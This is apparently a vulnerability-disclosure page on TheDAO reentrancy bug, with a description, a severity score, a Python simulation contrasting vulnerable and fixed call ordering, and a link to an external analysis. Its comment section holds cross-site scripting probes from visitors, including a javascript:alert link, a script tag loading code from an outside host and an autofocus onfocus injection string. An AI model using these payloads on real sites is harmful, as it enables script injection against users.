
The DAO Reentrancy

ID: 1
Submit date: 10.25.2018
Publish date: 10.25.2018
Author:
Score: 10.0

Description

The bug is that when splitDAO() is called, it calls the recipient's code to transfer Ethereum coin, and the recipient's code then calls splitDAO() again before the first call has finished. The process repeats itself: more Ethereum coin is transferred, splitDAO() is called again, which calls the hacker's code, which calls splitDAO(), which calls the hacker's code, and so on. The process continues until it drains all of TheDAO's coin.

BVSS:1.1/B:S/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H/CI:N/II:H/AI:N
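The call ordering from the description, as a small Python model added here for illustration (it is not TheDAO's Solidity code and not part of the original entry). `Vault`, `split`, `Reentrant` and all amounts are constructed assumptions; the model compares clearing the recorded balance after the external call with clearing it before the call (checks-effects-interactions).

```python
# Simplified model of the call ordering only; names and amounts are constructed.
class Vault:
    """Holds coin for depositors; `safe` selects the ordering used in split()."""
    def __init__(self, safe):
        self.safe = safe
        self.credit = {}   # recorded balance per account
        self.ether = 0     # coin actually held by the contract

    def deposit(self, who, amount):
        self.credit[who] = self.credit.get(who, 0) + amount
        self.ether += amount

    def split(self, who):
        amount = self.credit.get(who, 0)
        if amount == 0 or self.ether < amount:
            return                       # nothing owed, or nothing left to pay
        if self.safe:
            self.credit[who] = 0         # effect first ...
        self.ether -= amount
        who.receive(self, amount)        # ... then the external call
        if not self.safe:
            self.credit[who] = 0         # too late: the callee has already re-entered

class Honest:
    def __init__(self):
        self.received = 0
    def receive(self, vault, amount):
        self.received += amount

class Reentrant(Honest):
    """Recipient whose receive hook calls split() again, up to max_depth times."""
    def __init__(self, max_depth):
        super().__init__()
        self.depth, self.max_depth = 0, max_depth
    def receive(self, vault, amount):
        self.received += amount
        if self.depth < self.max_depth:
            self.depth += 1
            vault.split(self)            # re-enter before the outer call finishes

def run(safe, depth, others=90, own=10):
    """Return (coin paid to the re-entering recipient, coin left in the vault)."""
    vault = Vault(safe)
    vault.deposit(Honest(), others)      # other depositors' funds
    caller = Reentrant(depth)
    vault.deposit(caller, own)
    vault.split(caller)
    return caller.received, vault.ether
```

With the balance cleared before the external call, the nested `split()` finds a zero balance and returns, so the recipient is paid its own 10 once regardless of `depth`.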

Proof of concept

http://hackingdistributed.com/2016/06/18/analysis-of-the-dao-exploit/

Attachments

Comments


November, 2 01:34pm

nice

@fixit November, 18 10:26am

S

December, 23 03:12am

nic

@zseano January, 10 11:25pm
@Arbin January, 15 01:04pm

<a href=javascript:alert(1);//>nice 2</a>

@Arbin January, 15 01:06pm

<a>x</a>

@Abzi February, 26 03:58pm

cool

@Sellvamanoj April, 1 08:22am

14.rs

@Sellvamanoj April, 1 08:23am

<script src=//14.rs></script>

@Sellvamanoj April, 1 08:23am

"'--!><Input Type=Text AutoFocus Onfocus=confirm13 <!--//#